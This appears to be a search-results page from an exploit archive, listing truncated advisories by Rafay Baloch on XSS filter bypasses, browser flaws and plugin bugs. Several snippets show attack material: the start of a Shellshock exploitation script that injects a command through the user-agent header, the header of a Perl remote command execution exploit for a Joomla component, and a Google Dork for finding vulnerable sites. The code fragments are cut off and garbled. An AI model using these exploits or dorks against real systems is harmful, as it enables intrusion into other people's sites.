25 matches found
Google Chrome 109.0.5414.74 Unsafe Library Load Vulnerability
Google Chrome version 109.0.5414.74 on Ubuntu attempts to load libnssckbi.so from a user-writable location and if missing, a replacement piece of malware can be used by an attacker to achieve code execution. Although privilege escalation is not likely as an attacker would already need access to t...
Mobile Browser Bugs Open Safari, Opera Users to Malware
A set of address-bar spoofing vulnerabilities that affect a number of mobile browsers open the door for malware delivery, phishing and disinformation campaigns. The bugs, reported by Rapid7 and independent researcher Rafay Baloch, affect six browsers, ranging from the common Apple Safari, Opera...
Microsoft Internet Explorer 11 XSS Filter Bypass
Vulnerability: IE 11 XSS Filter Bypass Impact: Moderate Authors: Rafay Baloch Company: RHAInfoSec Website: http://rafayhackingarticles.net version: Latest Description Internet Explorer 11 suffers from an XSS filter bypass using the cp1025 charset. This is highly effective when the charset has not been...
Shell Shock Auto Exploitation Script
Title: Shell Shock Auto Exploitation Script Author: Rafay Baloch import requests,sys if lensys.argv 2: print "Usage: shocktest.py file.txt" exit0 def main: file = sys.argv1 with openfile as f: file = f.read.splitlines for url in file: cmd=" test;;/bin/nopatchobfu" headers = 'user-agent': cmd...
Android Browser Same Origin Policy Bypass Vulnerability
A SOP bypass occurs when a sitea.com is somehow able to access the properties of siteb.com such as cookies, location, response etc. Due to the nature of the issue and potential impact, this is very rarely found in modern browsers. However, they are found once in a while. Vulnerability: Android...
Google Chrome 31.0 XSS Auditor Bypass Vulnerability
Google Chrome XSS auditor was found prone to a bypass when the user input passed through location.hash was being written to the DOM by using document.write property. Normally, XSS auditor checks XSS by comparing the request and response however, it also checks for request itself, if it contains an...
Google Chrome 36.0 XSS Auditor Bypass
Vulnerability: Google Chrome 36.0 XSS Auditor Bypass Impact: Moderate Authors: Rafay Baloch Company: RHAInfoSec Website: http://rhainfosec.com version: Latest Description Google Chrome XSS auditor was found prone to a bypass when the user input passed through location.hash was being written to the...
Lavarel-Security XSS Filter Bypass Vulnerability
Lavarel-Security cross site scripting filter suffers from a bypass vulnerability. Product: Lavarel-Security XSS Filter Bypass Vulnerability: Mutation Based XSS Bypass Impact: Medium/High Authors: Rafay Baloch Company: RHAinfoSEC Website: http://rhainfosec.com Status: Fixed ========= Description...
Joomla JMultimedia Command Execution
!/usr/bin/perl Exploit Title: comjmultimedia Remote Command Execution Author: Deepankar Arora and Rafay Baloch Vendor: http://joomlacode.org/gf/project/denvideo/ Enter the target in this form -- http://victim.com/ Change shell path to your own, if needed use LWP::UserAgent; use HTTP::Request;...
WordPress Pretty Photo Cross Site Scripting
Wp-Pretty Photo DOM Based XSS Vulnerability Details ======= Product: PrettyPhoto Plugin Security-Risk: Moderate Remote-Exploit: yes Company: RHAINFOSEC Website: http://services.rafayhackingarticles.net Vendor-URL: https://github.com/scaron/prettyphoto Vendor-Status: informed Advisory-Status:...
OWASP Java Encoder Filter Bypass
Product: OWASP Java Encoder Vulnerability: Mutation Based XSS Bypass Impact: Medium/Limited Authors: Rafay Baloch And Alex Infuhr Company: RHAinfoSEC Website: http://services.rafayhackingarticles.net Status: To be fixed in the next release ========= Description ========= Owasp encoder is an...
Modsecurity Cross Site Scripting Bypass Vulnerability
Modsecurity suffers from a cross site scripting bypass vulnerability. Product: Modsecurity Author: Rafay Baloch Company: RHAINFOSEC Website: http://services.rafayhackingarticles.net Reported: 8/8/2013 Fixed: 25/8/2013 Status: Fixed ============ Introduction ============ The ModSecurity firewall i...
Modsecurity Cross Site Scripting Bypass
Product: Modsecurity Author: Rafay Baloch Company: RHAINFOSEC Website: http://services.rafayhackingarticles.net Reported: 8/8/2013 Fixed: 25/8/2013 Status: Fixed ============ Introduction ============ The ModSecurity firewall is one of the most known WAF around, It has an online smoke test where w...
Xorbin Analog Flash Clock 1.0 For WordPress XSS
==================================================================== Xorbin Analog Flash Clock 1.0 Plugin for Wordpress Flash-based XSS ==================================================================== Description: This plugin displays analog flash clock on your website. It's easy to use and...
Xorbin Digital Flash Clock 1.0 For WordPress XSS
==================================================================== Xorbin Digital Flash Clock 1.0 Plugin for Wordpress Flash-based XSS ==================================================================== Description: This plugin displays digital flash clock on your website. It's easy to use and...
Xorbin Analog Flash Clock 1.0 For Joomla XSS
==================================================================== Xorbin Analog Flash Clock 1.0 Extension for Joomla Flash-based XSS ==================================================================== Description: This plugin displays analog flash clock on your website. It's easy to use and...
CyberKendra Search Bar Cross Site Scripting
RHA InfoSec CyberKendra Search Bar Script DOM Based XSS Vulnerability Details ============= Risk: Moderated Vendor-URL: http://www.cyberkendra.com/ Credits ============= Discovered by: Rafay Baloch And Prakhar Prasad of RHA InfoSec Blog: http://rafayhackingarticles.net Description ============...
HtmlCommentBox Cross Site Scripting
Exploit Title: HtmlCommentBox Multiple Vulnerabilities Release Date: 01/06/2013 Author: Rafay Baloch And Deepankar Arora Website: www.rafayhackingarticles.net Contact: www.rafayhackingarticles.net Vendor: www.htmlcommentbox.com Versions Affected: All Google Dork: intext:"by HtmlCommentBox" 1...
Fork CMS Cross Site Scripting
=================================================================================== Fork-CMS Stored XSS: Stored XSS: Author: Rafay Baloch Introduction: Cross Site Scripting XSS has been a problem for ages, XSS occurs when the input data is copied into application responses without being sanitized...
Your Own Classifieds Cross Site Scripting
Vendor: http://www.yourownclassifieds.com Description: Your own classified software is a script that helps you create your own store. Discovered by: Rafay Baloch Vulnerability: Non persistent XSS The script fails to sanitize the input that is entered into the text box resulting in an XSS. POC:...